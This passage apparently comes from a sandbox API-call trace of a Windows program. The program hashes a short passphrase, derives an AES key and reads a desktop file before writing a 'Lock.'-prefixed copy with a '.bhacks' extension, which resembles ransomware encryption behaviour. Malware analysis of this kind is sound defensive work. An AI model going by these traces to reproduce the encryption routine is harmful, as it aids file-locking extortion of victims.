CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.588] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.588] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.588] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.588] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.588] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.588] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.588] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.628] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.628] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9dc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0102.628] CryptCreateHash (in: hProv=0x9beab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0102.628] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0102.628] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.628] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0102.629] CryptHashData (hHash=0x9a3b80, pbData=0x2a71898, dwDataLen=0x3, dwFlags=0x1) returned 1 [0102.629] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.629] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.629] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.629] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9dc0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0102.629] CryptDeriveKey (in: hProv=0x9beab0, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a43c0) returned 1 [0102.629] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.629] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0102.629] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0102.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\mcqmpnooyuyp.gif.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0102.630] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.630] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.631] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0102.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0102.631] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.mCQMPnOOyUYP.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.mcqmpnooyuyp.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0102.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0102.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0102.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cad020 [0102.679] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0102.680] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x2da0, lpOverlapped=0x0) returned 1 [0102.680] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0102.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0102.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2da0) returned 0x2ace888 [0102.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cad020 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0102.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0102.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2da0) returned 0x2a7a130 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2da0) returned 0x2ace888 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0102.685] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.685] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2da0) returned 0x2ace888 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0102.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0102.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0102.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2da0) returned 0x2a7ced8 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0102.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0102.686] RtlAllocateHeap 